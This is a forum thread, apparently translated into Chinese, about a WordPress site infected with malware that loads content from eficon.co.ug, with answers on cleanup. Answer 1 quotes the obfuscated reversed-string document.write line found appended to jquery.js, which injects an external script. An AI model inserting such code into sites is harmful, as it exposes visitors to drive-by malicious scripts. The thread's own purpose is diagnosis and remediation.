Eficon.co.ug 恶意软件问题

Question

当我尝试登录我的 wordpress 应用程序时，我收到来自谷歌浏览器的恶意软件警告，检测到我网站上来自 eficon.co.ug 的内容。

我制作了一些脚本来扫描网站，发现它是通过一个名为 admin_print_scripts 的函数实现的。

然后我制作了另一个脚本来确定这个函数出现在哪些文件中：

/wp-content/plugins/woocommerce/admin/post-types/shop_order.php

/wp-content/themes/twentyfourteen/functions.php

/wp-includes/default-filters.php

/wp-admin/includes/template.php

/wp-admin/includes/media.php

/wp-admin/admin-header.php

/wp-admin/press-this.php

/wp-admin/custom-header.php

我查看了这些文件，什么也没找到。

还有其他人尝试过类似的方法并找到了解决方案吗？

干杯。

Answer 1

我们的网站今天早上也遭到了入侵，经过数小时的搜索，我们找到了位于 /wp-includes/js/jquery/jquery.js 中的 jquery.js

在 jQuery 库的底部有一段烦人的代码：

document.write('>tpircs/<>"/rcs/gu.oc.nocife//:ptth"=crs tpircs<'.split("").reverse().join(""))

我们不确定该网站是如何被入侵的，但我们仍在寻找。

Answer 2

得知您的网站已损坏，我们深感抱歉。如果您有无恶意软件的备份，则恢复是让您的网站再次运行的最简单、最快捷的方法。

如果没有可用的备份并且您的网站没有经过高度修改，那么从 完全 全新安装 WordPress 核心、插件和主题开始是第二好的选择。我会将损坏帐户的 public_html 中的所有内容下载到您 PC 上的文件夹中，然后完全删除 public_html。然后在全新安装后重新连接数据库并仔细搜索数据库中的恶意软件。

如果您最近有大量数据更改、高度修改的模板（或其他文件）并且没有备份，则您需要自己查找并删除所有恶意软件。正如您已经发现的那样，既有原始安装中没有的文件，也有安装附带但现在已修改的文件。

有许多很好的插件可以帮助您找到坏文件并修复您的网站。 Wordfence 将扫描您的网站以查找恶意代码。它会告诉您是否可以删除文件，或者它将文件重置为原始状态。请务必查看文件以确保 Wordfence 发现错误代码而不是您的修改之一。 Wordfence 有一个内置的比较文档功能来帮助完成这项任务。

这不是一件容易的事。您必须找到黑客添加或更改的所有内容。否则，您的网站可能会再次受损。不要仅仅因为您的网站似乎正在运行而停止查找。您将希望尽可能多地从不同的插件运行服务器端恶意软件扫描。 Wordfence 是一个非常好的产品，但它可能无法找到每一段糟糕的代码。

请在清理文件后记住。您仍然需要确保数据库没有恶意软件。

https://wordpress.org/support/ 有一个很好的 WordPress 网站资源。加入并在论坛中搜索“被黑网站”。那里有很多人可以提供帮助和大量信息。

祝您维修顺利。

Answer 3

我搜索了我网站的 WordPress 数据库，并通过在所有表中搜索“gu.oc”找到了与上述相同的代码。我在主页的文本小部件中发现了烦人的代码。从测试小部件中删除这行代码后，Chrome 不再在我的网站上声明恶意软件。